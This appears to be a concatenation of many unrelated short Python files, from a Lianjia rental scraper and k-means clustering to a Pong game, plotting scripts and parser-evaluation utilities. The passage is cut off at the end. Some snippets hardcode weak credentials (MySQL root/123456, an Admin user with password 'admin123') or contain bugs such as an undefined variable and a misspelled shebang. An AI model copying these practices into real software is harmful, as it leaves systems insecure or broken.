items = Item.objects.order_by('-created_at')[:30]
return dict(items=items)
def image(request, id):
# TODO: currently it is assumed that we have only image files
item = get_object_or_404(Item, id=int(id))
with open(item.path, 'rb') as fin:
return HttpResponse(fin.read(), content_type=item.type.mime_type)
def thumbnail(request, id):
item = get_object_or_404(Item, id=int(id))
thumbnail = generate_thumbnail_of_item(item, 180, 160, 'png')
return HttpResponse(thumbnail, content_type='image/png')
|
#!/usrabin/env pyhton
import sys
sys.path.append('/usr/local/lib/python3.6/site-packages')
# 链家租房
import requests
from tools.UserAgent import USERAGENT_LIST
from lxml import etree
import random
import time
import re
import pymysql
import gevent
from tools.spider_58 import five_eight
from tools.ziru import ZiruSpider
class LianjiaSpider(object):
def __init__(self):
self.url = "https://bj.lianjia.com/"
self.db = pymysql.connect('localhost', 'root', '123456', 'House_db', charset='utf8')
self.cursor = self.db.cursor()
def get_headers(self):
headers = {'User-Agent': random.choice(USERAGENT_LIST)}
return headers
# 功能函数:获取页面内容
def get_html(self, url):
res = requests.get(url=url, headers=self.get_headers())
res.encoding = 'utf-8'
html = res.text
return html
# 功能函数:解析
# xpath_dbs:'//div[@class="content__list--item"]/a/@href'
def xpath_func(self, html, xpath_dbs):
parse_obj = etree.HTML(html)
re_list = parse_obj.xpath(xpath_dbs)
return re_list
# 正则解析
def re_func(self, re_dbs, html):
pattern = re.compile(re_dbs, re.S)
r_list = pattern.findall(html)
return r_list
def parse_html(self, url):
item = {}
a_html = self.get_html(url)
# 设置基准xpath
xpath = '//div[@class="content__list--item"]'
li_list = self.xpath_func(a_html, xpath)
# xpath_dbs1 = '//div[@class="content__list--item"]/a/@href'
# xpath_dbs2 = '//div[@class="content__list--item"]//p[@class="content__list--item--title twoline"]/a/text()'
# info_list = self.xpath_func(a_html, xpath_dbs2)
# ['/zufang/BJ2341868613260558336.html'','','','']
# 在这里拿到 所有房源详情链接
# print(li_list)
# 对房源链接发请求获取 经纬度+名字+详情链接+其他信息(价钱)
for li in li_list:
# 1,房源详情链接
re_dbs1 = './a/@href'
href = li.xpath(re_dbs1)
second_url = self.url + href[0]
item['url'] = second_url
# 2,房源信息
re_dbs2 = './/p[@class="content__list--item--title twoline"]/a/text()'
message = li.xpath(re_dbs2)
item['message'] = message[0].strip()
# 3,价钱
re_dbs3 = './/span/em/text()'
price = li.xpath(re_dbs3)
item['price'] = float(price[0].strip())
# 4,房源经纬度---返回值:{'lon:': '116.192696', 'lat:': '39.921511'}
locat = self.get_locat(second_url)
item['locat'] = locat
imgs = './static/imgs/img'+str(random.randint(11,18))+'.jpeg'
# 插入数据库数据
value = [item['message'],'链家网',item['message'],item['price'],item['locat'][0],item['locat'][1],item['url'],imgs]
print(value)
try:
ins = 'insert into LianJia_table(house_name,platform,house_message,price,lon,lat,url,images) values(%s,%s,%s,%s,%s,%s,%s,%s)'
self.cursor.execute(ins,value)
self.db.commit()
except Exception as e:
print(e)
# 获取经纬度
def get_locat(self, second_url):
locat = {}
second_html = self.get_html(second_url)
re_dbs = "var contact = {};.*?longitude: '(.*?)'.*?latitude: '(.*?)'.*?</script>"
a_list = self.re_func(re_dbs, second_html)
# locat['lon:'] = a_list[0][0].strip()
# locat['lat:'] = a_list[0][1].strip()
a_list = [float(i) for i in a_list[0]]
return a_list
def run(self):
for pg in range(1, 70):
url = self.url + 'zufang/pg{}'.format(pg)
self.parse_html(url)
time.sleep(random.uniform(1, 3))
if __name__ == '__main__':
from gevent import monkey
monkey.patch_socket()
l = []
lian_jia_spider = LianjiaSpider()
spider_58 = five_eight()
spider_ziru = ZiruSpider()
spider1 = gevent.spawn(lian_jia_spider.run)
spider2 = gevent.spawn(spider_58.run)
spider3 = gevent.spawn(spider_ziru.run)
l.append(spider1)
l.append(spider2)
l.append(spider3)
gevent.joinall(l)
|
## Group members : Myungjin Lee, Krishna Akhil Maddali, Yash Shahapurkar
import copy
import numpy
import random
from matplotlib import pyplot as plt
inp_file='clusters.txt'
f_inp_obj=open(inp_file, 'r')
x=[]
y=[]
for line in f_inp_obj:
tmp=line.split(',')
if len(tmp)==2:
x.append(float(tmp[0]))
y.append(float(tmp[1]))
data=numpy.array(list(zip(x, y)))
cent_x=[]
cent_y=[]
k=3
for i in range(k):
cent_x.append(random.randrange(int(numpy.min(x)), int(numpy.max(x))))
cent_y.append(random.randrange(int(numpy.min(y)), int(numpy.max(y))))
cent=numpy.array(list(zip(cent_x, cent_y)), dtype=numpy.float32)
clus=numpy.zeros(len(data))
labels=numpy.zeros(len(data))
flag=True
while flag:
for i in range(len(data)):
dist=numpy.zeros(3).reshape(3,1)
for j in range(k):
dist[j]=numpy.linalg.norm(data[i]-cent[j])
if numpy.isnan(dist).any():
nan_x=[]
nan_y=[]
for l in range(k):
nan_x.append(random.randrange(int(numpy.min(x)), int(numpy.max(x))))
nan_y.append(random.randrange(int(numpy.min(y)), int(numpy.max(y))))
cent=numpy.array(list(zip(nan_x, nan_y)), dtype=float)
clus[i]=numpy.argmin(dist)
cent_old=copy.copy(cent)
for j in range(k):
tmp_x=[]
tmp_y=[]
for i in range(len(data)):
if clus[i]==j:
tmp_x.append(data[i][0])
tmp_y.append(data[i][1])
cent[j][0]=numpy.mean(tmp_x)
cent[j][1]=numpy.mean(tmp_y)
del tmp_x
del tmp_y
if (cent==cent_old).all():
flag=False
print(cent)
for i in range(len(data)):
distance = numpy.zeros((3,1))
for j in range(k):
distance[j] = numpy.linalg.norm(data[i] - cent[j])
labels[i] = numpy.argmin(distance)
plt.scatter(data[:,0], data[:,1],c=labels ,s=50, cmap='viridis')
plt.scatter(cent[:,0], cent[:,1], marker='*', c='r', s=100)
plt.show()
|
name = 'zed a shaw'
age = 35 # not a lie
height = 74 # inches
weight = 180 # lbs
height_cm = height * 2.54
weight_kg = weight * 0.453592
eyes = 'blue'
teeth = 'white'
hair = 'brown'
print(f"Let's talk about {name}.")
print(f"He's {height} inches tall")
print(f"(that's {height_cm} in cm)")# convert to cm
print(f"He's {weight} pounds heavy")
print(f"(that's {weight_kg} in kg)")# convert to kg
total = age + height + weight
print(f"If we add {age}, {height}, and {weight} we get {total}.")
|
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/topics/items.html
from scrapy.item import Item, Field
class Etymology(Item):
# define the fields for your item here like:
entry_word = Field()
entry_link = Field()
description_word = Field()
description_link = Field()
|
def roundup(k):
if k != int(k): k = k // 1 + 1
return int(k)
n = int(input())
pakls = [float(inp) for inp in input().split()[:n]]
bound = [float(inp) for inp in input().split()]
cost = int(input())
unf = len(pakls)
loss = 0
for pak in pakls:
if not (bound[0] <= pak <= bound[1]):
unf -= 1
loss += cost * roundup(pak)
if unf == len(pakls): print ('100% paku memenuhi standar')
else:
perc = round(100 * unf / len(pakls))
print('{}% paku memenuhi standar, kerugian {} rupiah'.format(perc, loss))
|
import random
def getElements():
lst = []
for i in range(1,11):
lst.append(random.randint(1,20))
return lst
lst = getElements()
ele1 = int(input("Guess a number in range (1-20) :"))
ele2 = int(input("Guess a number in range (1-20) :"))
ele3 = int(input("Guess a number in range (1-20) :"))
if ele1 in lst and ele2 in lst and ele3 in lst:
print(f"Success")
else:
print(f"Fail")
print(lst)
|
n = int(input().strip())
A = [int(A_temp) for A_temp in input().strip().split(' ')]
b=set(A)
ans=max(A)
c=0
for i in b:
if A.count(i)>=2:
ans=min(ans,abs((A.index(i))-(len(A)-A[::-1].index(i)-1)))
else:
c+=1
if(c==len(A)):
print(-1)
else:
print(ans) |
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 16 16:02:55 2019
@author: leona
"""
#Now from the clean intro and plots we start building the dictionary that will have "index":word, so we have a unique associatioin between a word in the dataset we care about and a number. Obviously we will save it as json file, as many other dictionaries that follow to be able to use them when we want in our search engine.
dictionar = {}
k = 0
for i in range(30000):
file1 = open("Cleantsv/filmclean-"+str(i)+'.tsv', encoding="utf8")
line = file1.read()# Use this to read file content as a stream:
#print(line)
words = line.split('\t')
wordssplitted1 = words[14].split()
wordssplitted2 = words[15].split()
#print(wordssplitted1, wordssplitted2)
for i in wordssplitted1:
#print(type(i))
if i not in dictionar:
dictionar[i] = str(k)
k = k+1
for i in wordssplitted2:
#print(type(i))
if i not in dictionar:
dictionar[i] = str(k)
k = k+1
#dictionar
import json
with open('Dictionary.json', 'w') as fp:
json.dump(dictionar, fp)
#inverted dictionary now
dictionar2 = {}
length = 0
for i in range(30000):
file = "Cleantsv/filmclean-"+str(i)+'.tsv'
file1 = open(file, encoding="utf8")
line = file1.read()# Use this to read file content as a stream:
#print(line)
words = line.split('\t')
wordssplitted1 = words[14].split()
wordssplitted2 = words[15].split()
#print(wordssplitted1, wordssplitted2)
for j in wordssplitted1:
code = diction[j]
if code not in dictionar2:
dictionar2[code] = [file]
elif file not in dictionar2[code]:
dictionar2[code].append(file)
for j in wordssplitted2:
code = diction[j]
if code not in dictionar2:
dictionar2[code] = [file]
elif file not in dictionar2[code]:
dictionar2[code].append(file)
#dictionar
import json
with open('Dictionary1.json', 'w') as fp:
json.dump(dictionar2, fp)
|
"""
grpc test client
"""
from fastapi import FastAPI
from api.services.books import router
app = FastAPI(docs_url='/api', openapi_url='/api/openapi.json')
app.include_router(router, prefix='/api/book', tags=['book'])
|
import turtle
import winsound
import os # For screen clear command
wn = turtle.Screen()
wn.title("Mini project")
wn.bgcolor("black")
wn.setup(width = 800, height = 600)
wn.tracer(0)
#Score
score_a = 0
score_b = 0
#Ball
ball = turtle.Turtle()
ball.speed(0)
ball.shape("circle")
ball.color("white")
ball.penup()
ball.goto(0, 0)
ball.dx = 0.2
ball.dy = -0.2
# Pen
pen = turtle.Turtle()
pen.speed(0)
pen.color("white")
pen.penup()
pen.hideturtle()
pen.goto(0, 260)
pen.write("Player A: 0 Player B: 0",align="center",font=("Courier",24 ,"normal"))
#Mypen
mypen = turtle.Turtle()
mypen.speed(0)
mypen.color("white")
mypen.penup()
mypen.hideturtle()
mypen.goto(0, -260)
mypen.sec = 5
#Winning score
mypen1 = turtle.Turtle()
mypen1.speed(0)
mypen1.color("white")
mypen1.penup()
mypen1.hideturtle()
mypen1.goto(0, 230)
mypen1.sec = 5
mypen1.write("Winning score : 5",align="center",font=("Courier", 20 ,"normal"))
class paddle(turtle.Turtle):
def properties(self,name,sp,sh,co,x,y):
self.name = name
self.speed(sp)
self.shape(sh)
self.color(co)
self.shapesize(stretch_wid=5, stretch_len=1)
self.penup()
self.goto(x,y)
a = paddle()
b = paddle()
# "paddle_a", 0, "square", "white", -350, 0
# "paddle_b", 0, "square", "white", 0, -350
a.properties("paddle_a", 0, "square", "white", -350, 0)
b.properties("paddle_b", 0, "square", "white", 350, 0)
#Function to move paddles
def paddle_a_up():
y = a.ycor()
y += 20
a.sety(y)
def paddle_a_down():
y = a.ycor()
y -= 20
a.sety(y)
def paddle_b_up():
y = b.ycor()
y += 20
b.sety(y)
def paddle_b_down():
y = b.ycor()
y -= 20
b.sety(y)
def countdown():
wn.ontimer(quit,1000)
#Keybindings
wn.listen()
wn.onkeypress(paddle_a_up, "w")
wn.onkeypress(paddle_a_down, "s")
wn.onkeypress(paddle_b_up, "Up")
wn.onkeypress(paddle_b_down, "Down")
#Main game loop
while True:
wn.update()
#Move the ball
ball.setx(ball.xcor() + ball.dx)
ball.sety(ball.ycor() + ball.dy)
# Border Check or limitation
if ball.ycor() > 290:
ball.sety(290)
ball.dy *= -1
winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
if ball.ycor() < -290:
ball.sety(-290)
ball.dy *= -1
winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
if ball.xcor() > 390:
ball.goto(0, 0)
ball.dx *= -1
score_a +=1
pen.clear()
pen.write("Player A: {} Player B: {}".format(score_a,score_b),align="center",font=("Courier",24 ,"normal"))
if ball.xcor() < -390:
ball.goto(0, 0)
ball.dx *= -1
score_b +=1
pen.clear()
pen.write("Player A: {} Player B: {}".format(score_a,score_b),align="center",font=("Courier",24 ,"normal"))
# Paddle and ball collisions
if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < b.ycor() + 40 and ball.ycor() > b.ycor() -40):
ball.setx(340)
ball.dx *=-1
winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < a.ycor() + 40 and ball.ycor() > a.ycor() -40):
ball.setx(-340)
ball.dx *=-1
winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
if score_a == 5 :
mypen.write("Game over, Player A wins the game",align="center",font=("Courier",24 ,"normal"))
winsound.PlaySound('gameover.wav', winsound.SND_ASYNC)
turtle.done()
elif score_b == 5 :
mypen.write("Game over Player B wins the game",align="center",font=("Courier",24 ,"normal"))
winsound.PlaySound('gameover.wav', winsound.SND_ASYNC)
turtle.done() |
#!/usr/bin/env python
from __future__ import print_function
import sys
import matplotlib
matplotlib.use('Agg') # don't try to use $DISPLAY
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.gridspec as gridspec
import numpy as np
import math
import operator
def setCustomHatchWidth(customWidth):
"""
Monkeypatch the pdf writing for hatches, to change the hatch line width
"""
# make sure you have the correct imports,
# they may differ depending on the matplotlib version
import matplotlib.backends.backend_pdf
from matplotlib.externals import six
from matplotlib.backends.backend_pdf import Name, Op
from matplotlib.transforms import Affine2D
from matplotlib.path import Path
def _writeHatches(self):
hatchDict = dict()
sidelen = 72.0
for hatch_style, name in six.iteritems(self.hatchPatterns):
ob = self.reserveObject('hatch pattern')
hatchDict[name] = ob
res = {'Procsets':
[Name(x) for x in "PDF Text ImageB ImageC ImageI".split()]}
self.beginStream(
ob.id, None,
{'Type': Name('Pattern'),
'PatternType': 1, 'PaintType': 1, 'TilingType': 1,
'BBox': [0, 0, sidelen, sidelen],
'XStep': sidelen, 'YStep': sidelen,
'Resources': res})
stroke_rgb, fill_rgb, path = hatch_style
self.output(stroke_rgb[0], stroke_rgb[1], stroke_rgb[2],
Op.setrgb_stroke)
if fill_rgb is not None:
self.output(fill_rgb[0], fill_rgb[1], fill_rgb[2],
Op.setrgb_nonstroke,
0, 0, sidelen, sidelen, Op.rectangle,
Op.fill)
self.output(customWidth, Op.setlinewidth)
# TODO: We could make this dpi-dependent, but that would be
# an API change
self.output(*self.pathOperations(
Path.hatch(path),
Affine2D().scale(sidelen),
simplify=False))
self.output(Op.stroke)
self.endStream()
self.writeObject(self.hatchObject, hatchDict)
matplotlib.backends.backend_pdf.PdfFile.writeHatches = _writeHatches
def parse_hets(filename):
h1 = []
n1 = []
with open(filename) as f:
next(f) # skip header
for line in f:
line = line.rstrip()
fields = line.split("\t")
assert(len(fields) == 3)
_, n, h = map(int, fields)
if n == 0:
break
h1.append(float(h)/n)
n1.append(n)
return h1, n1
if __name__ == "__main__":
if len(sys.argv) < 3:
print("usage: {} out.pdf hets.txt".format(sys.argv[0]), file=sys.stderr)
exit(1)
setCustomHatchWidth(1)
pdf = PdfPages(sys.argv[1])
#fig_w, fig_h = plt.figaspect(9.0/16.0)
fig_w, fig_h = plt.figaspect(3.0/4.0)
fig1 = plt.figure(figsize=(fig_w, fig_h))
gs1 = gridspec.GridSpec(2, 1)
ax1 = fig1.add_subplot(gs1[0])
ax2 = fig1.add_subplot(gs1[1], sharex=ax1)
#ax1 = fig1.add_subplot(111)
# black, orange, sky blue, blueish green, yellow, dark blue, vermillion, reddish purple
# pallete = ("#000000", "#906000", "#357090", "#006050", "#959025", "#004570", "#804000", "#806070")
#pal = ["#1b9e77", "#d95f02", "#7570b3"]
pal = ["#006050", "#806070", "#959025"]
facecols = ['lightblue', '#660000', 'yellow']
edgecols = ['darkblue', '#660000', 'darkyellow']
vlinestyles = ['-', '--', '-x']
fills = [True, False, True]
hatches = ['', 'xx', '--']
alpha = 1.0 #0.6
barwidth = 1.0
baroffset = 0.5
xlim = 0
ylim = False
for col, ec, hatch, fill, vls, fn in zip(facecols, edgecols, hatches, fills, vlinestyles, sys.argv[2:]):
h, n = parse_hets(fn)
n100 = np.sum(n[1:])
n05 = 0.05*n100
n95 = 0.95*n100
n99 = 0.99*n100
sum_n = 0
edf_n = [0.0,]
i05 = False
i95 = False
i99 = False
for i, nn in enumerate(n[1:], start=2):
sum_n += nn
edf_n.append(float(sum_n)/n100)
if not i05 and sum_n > n05:
i05 = i
if not i95 and sum_n > n95:
i95 = i
if not i99 and sum_n > n99:
i99 = i
#print(i05, i95, i99)
dph = list(enumerate(h[i05-1:i99], start=i05))
dph = sorted(dph, key=operator.itemgetter(1))
sum_n = 0
for _dp, _h in dph:
sum_n += n[_dp-1]
edf = float(sum_n)/n100
print(_dp, _h, edf, sep="\t")
x = np.arange(1, len(h)+1)
ax1.bar(x-baroffset, edf_n, width=barwidth, alpha=alpha, hatch=hatch, color=col, edgecolor=ec, fill=fill, label=fn)
ax2.bar(x-baroffset, h, width=barwidth, alpha=alpha, hatch=hatch, color=col, edgecolor=ec, fill=fill, label=fn)
if ylim:
ylim = max(np.max(h[:i99]), ylim)
else:
ylim = np.max(h[:i99])
xlim = max(xlim, i99)
ax2.set_ylim([0, ylim])
ax1.vlines(i05, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax2.vlines(i05, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax1.vlines(i95, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax2.vlines(i95, 0, 1.0, color=col, edgecolor=ec, lw=3, linestyle=vls)
ax1.set_ylim([0, 1.0])
ax1.set_xlim([0, xlim])
ax1.set_ylabel("CDF[n_reads(DP)]")
ax2.set_ylabel("H")
ax2.set_xlabel("DP")
ax1.legend(loc="lower right")
plt.tight_layout()
pdf.savefig()
pdf.close()
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
class obere(object):
a = 15
def __init__(self):
self.zahl = 42
self.a = 4
def fun(self):
return 17
def show(self):
print(self.a)
def delete(self):
del self.a
def arit(self):
self.a = self.a +4
class untere(obere):
def __init__(self):
self.nummer = 21
def fun(self):
return super().fun()
o = obere()
o.show()
o.delete()
o.show()
o.arit()
o.show() |
from __future__ import with_statement
from builderror import BuildError
from shermanfeature import ShermanFeature
import codecs
import os
import re
import subprocess
class Feature(ShermanFeature):
@ShermanFeature.priority(90)
def sourcesConcatenated(self, locale, moduleName, modulePath):
print " Minifying JavaScript..."
module = self.currentBuild.files[locale][moduleName]
js = module["__concat__"]
js = self.preMinifyTricks(js)
tempPath = self.projectBuilder.buildDir + "/" + moduleName + ".js"
with codecs.open(tempPath, "w", "utf-8") as f:
f.write(js)
p = subprocess.Popen("java -jar %s/other/closure-compiler/compiler.jar --js %s --jscomp_off nonStandardJsDocs" %
(self.shermanDir, tempPath), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
js = ""
err = ""
while p.poll() == None:
(stdoutdata, stderrdata) = p.communicate()
js += stdoutdata
err += stderrdata
if p.returncode == 0:
os.remove(tempPath)
else:
raise BuildError("Minification of module %s failed: %s" % (moduleName, err))
module["__concat__"] = js
def preMinifyTricks(self, js):
js = re.compile(r"((\w+\.)?)(?<!\w)Application *=", flags = re.MULTILINE).sub(r"\1A = \1Application =", js)
js = re.compile(r"(?<!\w)Application\.", flags = re.MULTILINE).sub("A.", js)
js = re.compile(r"((\w+\.)?)(?<!\w)Modules *=", flags = re.MULTILINE).sub(r"\1M = \1Modules =", js)
js = re.compile(r"(?<!\w)Modules\.", flags = re.MULTILINE).sub("M.", js)
js = re.compile(r"((\w+\.)?)(?<!\w)Tiles *=", flags = re.MULTILINE).sub(r"\1T = \1Tiles =", js)
js = re.compile(r"(?<!\w)Tiles\.showTileInContainer", flags = re.MULTILINE).sub("T.c", js)
js = re.compile(r"(?<!\w)Tiles\.showTile", flags = re.MULTILINE).sub("T.s", js)
js = re.compile(r"(?<!\w)Tiles\.pushModalTile", flags = re.MULTILINE).sub("T.m", js)
js = re.compile(r"(?<!\w)Tiles\.", flags = re.MULTILINE).sub("T.", js)
js = re.compile(r"((\w+\.)?)(?<!\w)UserAgent *=", flags = re.MULTILINE).sub(r"\1U = \1UserAgent =", js)
js = re.compile(r"(?<!\w)UserAgent\.", flags = re.MULTILINE).sub("U.", js)
return js
|
from run import db, User
username = "Admin"
password = "admin123"
level = "Admin"
db.session.add(User(username,password,level))
db.session.commit() |
class ExceptionSignalsBinder:
def __init__(self,exception_handler,choose_posts,post_to_group,edit_post,liable_about_view,warning_message,vk_operator):
self.__warning_message = warning_message
self.__exception_handler = exception_handler
self.__liable_about_view = liable_about_view
self.__post_to_group = post_to_group
self.__edit_post = edit_post
self.__choose_post = choose_posts
self.__vk_operator = vk_operator
self.snapping_signals()
self.snapping_post_to_group_signals()
self.snapping_choose_post_signals()
self.snapping_edit_post_signals()
self.snapping_vk_opearator_signals()
def snapping_signals(self):
self.__exception_handler.show_warning_dialog.connect(
self.__liable_about_view.show_warning_message)
self.__exception_handler.hide_warning_dialog.connect(
self.__liable_about_view.hide_warning_message)
self.__warning_message.accepted.connect(self.__exception_handler.fix)
self.__warning_message.accepted.connect(self.__liable_about_view.hide_warning_message)
def snapping_post_to_group_signals(self):
self.__post_to_group.occured_warning.connect(self.__exception_handler.handle_warning)
def snapping_choose_post_signals(self):
self.__choose_post.occured_warning.connect(self.__exception_handler.handle_warning)
def snapping_edit_post_signals(self):
self.__edit_post.occured_warning.connect(self.__exception_handler.handle_warning)
def snapping_vk_opearator_signals(self):
self.__vk_operator.occured_warning.connect(self.__exception_handler.handle_warning) |
import salem
from salem.utils import get_demo_file
import xarray as xr
import matplotlib.pyplot as plt
import pdb
import numpy as np
from functools import partial
from salem import get_demo_file, open_xr_dataset, GeoTiff, wgs84
dat = xr.open_dataarray('/users/global/cornkle/data/pythonWorkspace/proj_CEH/topo/gtopo_1min.nc')
#dat=dat.sel(lon=slice(-18,120), lat=slice(-30,60))
#dat=dat.sel(lon=slice(-100,-40), lat=slice(-30,60))
grid = dat.salem.grid
grid50 = grid.regrid(factor=0.03)
lakes = salem.read_shapefile(salem.get_demo_file('ne_50m_rivers_lake_centerlines.shp'), cached=True)
top_on_grid50 = grid50.lookup_transform(dat, method=np.std)
sm = dat.salem.get_map(cmap='topo')
lakes = salem.read_shapefile(salem.get_demo_file('ne_50m_rivers_lake_centerlines.shp'), cached=True)
sm.set_shapefile(lakes, edgecolor='k', facecolor='none', linewidth=2,)
mask_lakes = grid.region_of_interest(shape=lakes)
sm.set_data(top_on_grid50, grid50)
sm.set_plot_params(vmin=20, vmax=500)
#sm.set_data(dat, grid)
sm.visualize()
f = plt.figure()
sm.set_data(dat, grid)
sm.set_plot_params(vmax=1000)
sm.visualize()
|
print("Welcome to the Shipping Accounts Program\n")
ls = ["john","mike","jasmine","george","kelvin"]
name = input("Hello, what is your username: ").lower()
if name in ls:
print("Hello {}. Welcome back to your account.".format(name))
print("Current shipping prices are as follows:")
print("Shipping orders 0 to 100: $5.10 each")
print("Shipping orders 100 to 500: $5.00 each")
print("Shipping orders 500 to 1000: $4.95 each")
print("Shipping orders over 1000: $4.80 each")
item_ship = int(input("How many items would you like to ship: "))
if item_ship < 100:
a = 5.10
elif item_ship < 500:
a = 5.00
elif item_ship < 1000:
a = 4.95
else:
a = 4.80
cost_of_shipping = item_ship*a
cost_of_shipping = round(cost_of_shipping,2)
print("To ship {} items it will cost you {} at {} per item".format(item_ship, cost_of_shipping,a))
j = input("Would you like to place this order (y/n): ")
if j.startswith('y'):
print("Okay. Shipping your {} items.".format(item_ship))
else:
print("No order has been placed")
else:
print("Sorry, you do not have an account with us. Goodbye.")
|
# Bradley Aiken
# roster_fields.py
# used with cs176roster.webadvisor.txt
# reformat student information from read file
old_roster = open("cs176roster.webadvisor.txt", "r")
new_roster = open("roster.txt", "w")
# 0: name, 1: id, 2: email, 3: major, 4: year, 5: adviser, 6: credits
count = 0
for line in old_roster.readlines():
line = line.rstrip()
if count == 0: # name
print(line, end='', file=new_roster)
elif count == 1: # id
print(',', line, file=new_roster)
count += 1
count %= 8
|
from mininet_test.test_monitor import TestMonitor
from mininet_test.test_monitor_host import TestMonitorHost
|
"""
Read file into texts and calls.
It's ok if you don't understand how to read files.
"""
import csv
with open('texts.csv', 'r') as f:
reader = csv.reader(f)
texts = list(reader)
with open('calls.csv', 'r') as f:
reader = csv.reader(f)
calls = list(reader)
"""
TASK 0:
What is the first record of texts and what is the last record of calls?
Print messages:
"First record of texts, <incoming number> texts <answering number> at time <time>"
"Last record of calls, <incoming number> calls <answering number> at time <time>, lasting <during> seconds"
"""
class Textline:
def __init__(self, list):
self.incoming = list[0]
self.answering = list[1]
self.time = list[2]
if len(list) > 3:
self.seconds = list[3]
first_record = Textline(texts[0])
last_record = Textline(calls[-1])
print("First record of texts, "+first_record.incoming + " texts " +
first_record.answering + " at time "+first_record.time)
print("Last record of calls, "+last_record.incoming + " calls "+last_record.answering +
" at time "+last_record.time+", lasting " + last_record.seconds+" seconds") |
import boto3
def lambda_handler(event, context):
db = boto3.resource('dynamodb')
table = db.Table('Users')
with table.batch_writer() as batch:
batch.put_item(
Item={
'id': 1,
'name': 'parwiz',
'age': '20'
}
)
batch.put_item(
Item={
'id': 2,
'name': 'john',
'age': '20'
}
)
batch.put_item(
Item={
'id': 3,
'name': 'abc',
'age': '37'
}
) |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Parser evaluation utils."""
from __future__ import division
import tensorflow as tf
from syntaxnet import sentence_pb2
from syntaxnet.util import check
def calculate_parse_metrics(gold_corpus, annotated_corpus):
"""Calculate POS/UAS/LAS accuracy based on gold and annotated sentences."""
check.Eq(len(gold_corpus), len(annotated_corpus), 'Corpora are not aligned')
num_tokens = 0
num_correct_pos = 0
num_correct_uas = 0
num_correct_las = 0
for gold_str, annotated_str in zip(gold_corpus, annotated_corpus):
gold = sentence_pb2.Sentence()
annotated = sentence_pb2.Sentence()
gold.ParseFromString(gold_str)
annotated.ParseFromString(annotated_str)
check.Eq(gold.text, annotated.text, 'Text is not aligned')
check.Eq(len(gold.token), len(annotated.token), 'Tokens are not aligned')
tokens = zip(gold.token, annotated.token)
num_tokens += len(tokens)
num_correct_pos += sum(1 for x, y in tokens if x.tag == y.tag)
num_correct_uas += sum(1 for x, y in tokens if x.head == y.head)
num_correct_las += sum(1 for x, y in tokens
if x.head == y.head and x.label == y.label)
tf.logging.info('Total num documents: %d', len(annotated_corpus))
tf.logging.info('Total num tokens: %d', num_tokens)
pos = num_correct_pos * 100.0 / num_tokens
uas = num_correct_uas * 100.0 / num_tokens
las = num_correct_las * 100.0 / num_tokens
tf.logging.info('POS: %.2f%%', pos)
tf.logging.info('UAS: %.2f%%', uas)
tf.logging.info('LAS: %.2f%%', las)
return pos, uas, las
def parser_summaries(gold_corpus, annotated_corpus):
"""Computes parser evaluation summaries for gold and annotated sentences."""
pos, uas, las = calculate_parse_metrics(gold_corpus, annotated_corpus)
return {'POS': pos, 'LAS': las, 'UAS': uas, 'eval_metric': las}
def calculate_segmentation_metrics(gold_corpus, annotated_corpus):
"""Calculate precision/recall/f1 based on gold and annotated sentences."""
check.Eq(len(gold_corpus), len(annotated_corpus), 'Corpora are not aligned')
num_gold_tokens = 0
num_test_tokens = 0
num_correct_tokens = 0
def token_span(token):
check.Ge(token.end, token.start)
return (token.start, token.end)
def ratio(numerator, denominator):
check.Ge(numerator, 0)
check.Ge(denominator, 0)
if denominator > 0:
return numerator / denominator
elif numerator == 0:
return 0.0 # map 0/0 to 0
else:
return float('inf') # map x/0 to inf
for gold_str, annotated_str in zip(gold_corpus, annotated_corpus):
gold = sentence_pb2.Sentence()
annotated = sentence_pb2.Sentence()
gold.ParseFromString(gold_str)
annotated.ParseFromString(annotated_str)
check.Eq(gold.text, annotated.text, 'Text is not aligned')
gold_spans = set()
test_spans = set()
for token in gold.token:
check.NotIn(token_span(token), gold_spans, 'Duplicate token')
gold_spans.add(token_span(token))
for token in annotated.token:
check.NotIn(token_span(token), test_spans, 'Duplicate token')
test_spans.add(token_span(token))
num_gold_tokens += len(gold_spans)
num_test_tokens += len(test_spans)
num_correct_tokens += len(gold_spans.intersection(test_spans))
tf.logging.info('Total num documents: %d', len(annotated_corpus))
tf.logging.info('Total gold tokens: %d', num_gold_tokens)
tf.logging.info('Total test tokens: %d', num_test_tokens)
precision = 100 * ratio(num_correct_tokens, num_test_tokens)
recall = 100 * ratio(num_correct_tokens, num_gold_tokens)
f1 = ratio(2 * precision * recall, precision + recall)
tf.logging.info('Precision: %.2f%%', precision)
tf.logging.info('Recall: %.2f%%', recall)
tf.logging.info('F1: %.2f%%', f1)
return round(precision, 2), round(recall, 2), round(f1, 2)
def segmentation_summaries(gold_corpus, annotated_corpus):
"""Computes segmentation eval summaries for gold and annotated sentences."""
prec, rec, f1 = calculate_segmentation_metrics(gold_corpus, annotated_corpus)
return {'precision': prec, 'recall': rec, 'f1': f1, 'eval_metric': f1}
|
from torch import nn
import torch
import numpy as np
class TextLSTM(nn.Module):
"""
lstm model of text classify.
"""
def __init__(self, opt):
self.name = "TextLstm"
super(TextLSTM, self).__init__()
self.opt = opt
self.embedding = nn.Embedding(opt.vocab_size, opt.embed_dim)
self.lstm = nn.LSTM(input_size=opt.embed_dim,
hidden_size=opt.hidden_size,
num_layers=1,
batch_first=True,
bidirectional=False)
self.linears = nn.Sequential(
